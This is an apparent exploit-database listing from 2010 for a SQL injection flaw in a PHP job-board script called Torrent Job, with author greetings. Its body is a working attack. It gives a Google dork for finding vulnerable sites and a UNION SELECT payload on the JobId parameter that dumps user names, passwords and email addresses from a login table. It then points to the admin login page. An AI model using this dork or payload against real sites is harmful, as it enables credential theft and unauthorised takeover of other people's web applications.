Torrent Job SQL Injecti0n Vulnerability

2010-06-14T00:00:00
ID 1337DAY-ID-12704
Type zdt
Reporter JM511
Modified 2010-06-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =======================================
Torrent Job SQL Injecti0n Vulnerability
=======================================


( ALLH AKBAR )

#####################################################################################################
# Exploit Title: [Torrent Job SQL Injecti0n Vulnerability]     
# Date: [14 de junio de 2010  ]               
# Author: [ JM511 ]   	EmaiL : [email protected] , [email protected]    
# From :\ Saudi Arabia , 
# Greetz to:	[ GoLdeN-Z3r0 , Dr.Exe , Shi5 aL Hacker , Sec-Q8  ]
# Home : www.JM511.com
# Platform / Tested on: [php] 
# category: [SQL Injecti0n]
# d0rK g00gl3 :- "inurl:jobdetail.php?JobId="
#
######################################################################################################
#[ Exploit ]#

    [»] http://[target].com/script/jobdetail.php?JobId=511' <== [ SQL ]

    [»] : jobdetail.php?JobId=-511+UNION SELECT 1,2,3,4,5,6,7,8,group_concat(User_Name,0x3a,Password,0x3a,email_address),10,11,12,13,14,15+from+tpforum.login

    [»] Login: site.com/admin/

################################################################################

mY l0v3 : DLO , D7000M 

gReeT'x: www.sa3eka.com . www.alkrsan.com , www.sec-center.com




#  0day.today [2018-01-11]  #